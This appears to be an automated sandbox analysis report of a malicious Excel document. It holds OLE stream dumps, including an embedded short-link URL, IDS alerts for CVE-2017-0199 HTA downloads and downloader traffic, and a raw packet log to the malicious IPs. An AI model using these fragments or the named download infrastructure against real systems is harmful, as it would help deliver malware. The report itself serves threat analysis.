                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . i . . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                    General
                                    Stream Path:MBD0002FDB5/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:94
                                    Entropy:4.345966460061678
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD0002FDB5/\x1Ole
                                    CLSID:
                                    File Type:data
                                    Stream Size:20
                                    Entropy:0.5689955935892812
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD0002FDB5/CONTENTS
                                    CLSID:
                                    File Type:PDF document, version 1.4, 2 pages
                                    Stream Size:51052
                                    Entropy:7.425009754287402
                                    Base64 Encoded:True
                                    Data ASCII:% P D F - 1 . 4 . % . 1 0 o b j . < < / C r e a t o r ( M o z i l l a / 5 . 0 \\ ( W i n d o w s N T 1 0 . 0 ; W i n 6 4 ; x 6 4 \\ ) A p p l e W e b K i t / 5 3 7 . 3 6 \\ ( K H T M L , l i k e G e c k o \\ ) C h r o m e / 1 1 2 . 0 . 0 . 0 S a f a r i / 5 3 7 . 3 6 E d g / 1 1 2 . 0 . 1 7 2 2 . 5 8 ) . / P r o d u c e r ( S k i a / P D F m 1 1 2 ) . / C r e a t i o n D a t e ( D : 2 0 2 3 0 4 2 5 0 5 4 4 5 2 + 0 0 ' 0 0 ' ) . / M o d D a t e ( D : 2 0 2 3 0 4 2 5 0 5 4 4
                                    Data Raw:25 50 44 46 2d 31 2e 34 0a 25 d3 eb e9 e1 0a 31 20 30 20 6f 62 6a 0a 3c 3c 2f 43 72 65 61 74 6f 72 20 28 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 5c 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 5c 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 5c 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 5c 29 20 43 68 72 6f 6d 65 2f 31
                                    General
                                    Stream Path:MBD0002FDB6/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:99
                                    Entropy:3.631242196770981
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD0002FDB6/Package
                                    CLSID:
                                    File Type:Microsoft Excel 2007+
                                    Stream Size:33339
                                    Entropy:7.736923637750105
                                    Base64 Encoded:True
                                    Data ASCII:P K . . . . . . . . . . ! . G * t . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 47 d3 2a 74 a1 01 00 00 f4 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD0002FDB7/\x1Ole
                                    CLSID:
                                    File Type:data
                                    Stream Size:502
                                    Entropy:5.4193314803439465
                                    Base64 Encoded:False
                                    Data ASCII:. . . . } 5 P z . . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . e . x . i . . . l . i . n . k . / . J . k . A . P . b . L . . . ] Q x W 1 i \\ w O t . t [ m q \\ O . b ~ w H . # . , . f ` . . \\ y n . . l v m d 9 Q p . . . / ^ . > R V x o N V T V E * G 3 . k ^ . ( h ( $ v . ) } N f 0 . ? . . . . . . . . . . . . . . . . . . . B . C . D . i . u . q . I . d . A . f . w . g . e . 1 . 4 . c . J . J . E . n . j . M . o . N . R . p . d . o . Q . T . F . R . Y . t . a . d . 4 . B
                                    Data Raw:01 00 00 02 7d 95 35 50 90 7a 09 0c 00 00 00 00 00 00 00 00 00 00 00 00 ba 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b b6 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 65 00 78 00 69 00 2e 00 6c 00 69 00 6e 00 6b 00 2f 00 4a 00 6b 00 41 00 50 00 62 00 4c 00 00 00 d2 e9 f1 9b 5d 51 78 be 57 31 69 cb 5c cf f0 77 fb da 4f 74 f1 a2 15 c1 74 5b 6d da 71 5c 4f 02
                                    General
                                    Stream Path:Workbook
                                    CLSID:
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:352535
                                    Entropy:7.998834446756102
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . : . ' O v . W , F | 5 r V x C . . H d . j x . . . d . 8 8 4 m . . . . . . . P \\ . . . \\ . p . . . . u . u ` ^ ' " . . A B x S . m . . : r & [ G . G . . I U j . H . . > } . r Q i j H . l . . D . W + B . . . a . . . \\ . . . = . . . i 8 _ . . . 1 ^ ~ . . O . . . X T . . . . . . . . . 6 . . . . q Q . . . . . . . . . = . . . . & ~ . 5 ? . v . ` @ . . . . . . . " . . . { K . . . . e 8 . . . . . . . . 1 . . . . . ! 0 . X 6 Q M . . o . w 5 . 1 . . . * . m 5 2
                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a1 3a 14 ab 27 90 d5 4f 9e 76 da 99 57 2c 46 7c 35 b8 72 bc 56 78 e2 43 04 19 c1 48 64 16 6a 78 01 03 18 b2 64 df b9 93 38 87 b7 38 bb 34 6d ce e1 00 02 00 b0 04 c1 00 02 00 50 5c e2 00 00 00 5c 00 70 00 f5 8d f0 e1 dd 0d 06 c9 98 98 fb 75 d1 be b9 c0 bc 75 8a f0 e6 bf 60 d5 5e 27 94 bd 22 19
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                    CLSID:
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:529
                                    Entropy:5.184073023595938
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 8 8 2 A A 4 6 D - A 1 B 9 - 4 7 0 2 - A 2 7 D - 9 C 0 9 7 C C D 4 8 E 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 2 3 0 D C F C B A 0 0 B A 0 0 B
                                    Data Raw:49 44 3d 22 7b 38 38 32 41 41 34 36 44 2d 41 31 42 39 2d 34 37 30 32 2d 41 32 37 44 2d 39 43 30 39 37 43 43 44 34 38 45 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                    CLSID:
                                    File Type:data
                                    Stream Size:104
                                    Entropy:3.0488640812019017
                                    Base64 Encoded:False
                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                    CLSID:
                                    File Type:data
                                    Stream Size:2644
                                    Entropy:3.9826042792591148
                                    Base64 Encoded:False
                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                    CLSID:
                                    File Type:data
                                    Stream Size:553
                                    Entropy:6.360105151263399
                                    Base64 Encoded:True
                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . s m h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 73 6d cc 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                    2024-08-13T20:24:29.441065+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)18049164192.3.176.138192.168.2.22
                                    2024-08-13T20:24:57.178970+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24917580192.168.2.22193.122.6.168
                                    2024-08-13T20:24:55.151172+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24917380192.168.2.22158.101.44.242
                                    2024-08-13T20:24:47.619338+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24916680192.168.2.22158.101.44.242
                                    2024-08-13T20:24:59.390779+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24917780192.168.2.22132.226.247.73
                                    2024-08-13T20:25:01.590224+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24917880192.168.2.22158.101.44.242
                                    2024-08-13T20:24:59.765024+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24917880192.168.2.22158.101.44.242
                                    2024-08-13T20:25:32.528663+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349198443192.168.2.22188.114.97.3
                                    2024-08-13T20:25:18.333240+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349188443192.168.2.22188.114.96.3
                                    2024-08-13T20:24:52.301141+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24916980192.168.2.22193.122.130.0
                                    2024-08-13T20:24:25.427583+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)18049162192.3.176.138192.168.2.22
                                    2024-08-13T20:25:25.747694+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24918580192.168.2.22193.122.6.168
                                    2024-08-13T20:24:53.667052+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24917180192.168.2.22193.122.130.0
                                    2024-08-13T20:25:13.446448+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24918380192.168.2.22132.226.8.169
                                    2024-08-13T20:25:04.331026+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349184443192.168.2.22188.114.97.3
                                    2024-08-13T20:24:50.568228+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349168443192.168.2.22188.114.96.3
                                    2024-08-13T20:24:25.427448+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14916280192.168.2.22192.3.176.138
                                    2024-08-13T20:25:30.980799+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24919480192.168.2.22193.122.6.168
                                    2024-08-13T20:25:02.001202+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349182443192.168.2.22188.114.97.3
                                    2024-08-13T20:24:50.130991+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24916680192.168.2.22158.101.44.242
                                    2024-08-13T20:24:29.441030+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14916480192.168.2.22192.3.176.138
                                    2024-08-13T20:25:03.875237+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24918180192.168.2.22132.226.8.169
                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 13, 2024 20:24:23.866842985 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:23.866930962 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:23.867090940 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:23.875926018 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:23.875962019 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.381109953 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.381210089 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.389750004 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.389759064 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.390233040 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.390295029 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.498312950 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.544548988 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.912528038 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.912678957 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.912703037 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.912734985 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.912796021 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.912817955 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.914089918 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.914103031 CEST44349161159.203.133.15192.168.2.22
                                    Aug 13, 2024 20:24:24.914113998 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.914155006 CEST49161443192.168.2.22159.203.133.15
                                    Aug 13, 2024 20:24:24.938560009 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:24.944363117 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:24.944773912 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:24.944986105 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:24.950156927 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427314043 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427376032 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427411079 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427447081 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427448034 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.427470922 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.427500963 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.427582979 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427634001 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427669048 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427700996 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427733898 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427767038 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.427767992 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.427789927 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.427820921 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.432523966 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.432573080 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.432593107 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.432619095 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.432862997 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.433033943 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.438957930 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.514126062 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514175892 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514209986 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514257908 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.514297009 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514317989 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514409065 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514441967 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514476061 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.514659882 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.514957905 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515007019 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515022039 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515043974 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515063047 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515079975 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515094995 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515129089 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515294075 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515357018 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515377998 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515413046 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515428066 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515455008 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515458107 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515489101 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.515516043 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.515537977 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.516534090 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.516585112 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.516597033 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.516623020 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.516643047 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.516655922 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.516668081 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.516694069 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.516712904 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.516736984 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.517137051 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.517194033 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.519282103 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.519319057 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.519356966 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.519370079 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601017952 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601144075 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601155996 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601181030 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601198912 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601216078 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601242065 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601250887 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601265907 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601305008 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601315022 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601349115 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601382017 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601414919 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601447105 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601479053 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601514101 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601520061 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601543903 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601548910 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601564884 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601600885 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601604939 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601640940 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601658106 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601670980 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601691961 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601705074 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601716995 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601738930 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601758003 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601772070 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601787090 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601823092 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601824045 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601875067 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601888895 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601912022 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601936102 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601948977 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.601963043 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.601984978 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.602009058 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.602034092 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.602364063 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.602401972 CEST8049162192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:25.602420092 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.602442980 CEST4916280192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:25.602453947 CEST8049162192.3.176.138192.168.2.22
